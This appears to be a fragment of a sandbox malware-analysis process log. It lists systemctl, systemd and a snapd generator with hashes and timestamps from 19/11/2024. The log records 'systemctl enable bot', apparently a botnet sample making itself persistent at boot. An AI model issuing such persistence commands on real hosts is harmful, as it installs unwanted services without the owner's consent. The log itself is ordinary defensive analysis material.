Path: | /bin/systemctl |
Arguments: | /bin/systemctl enable bot |
File size: | 996584 bytes |
MD5 hash: | 4deddfb6741481f68aeac522cc26ff4b |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/lib/systemd/systemd |
Arguments: | - |
File size: | 1620224 bytes |
MD5 hash: | 9b2bec7092a40488108543f9334aab75 |
Start time (UTC): | 23:57:09 |
Start date (UTC): | 19/11/2024 |
Path: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
Arguments: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
File size: | 22760 bytes |
MD5 hash: | 3633b075f40283ec938a2a6a89671b0e |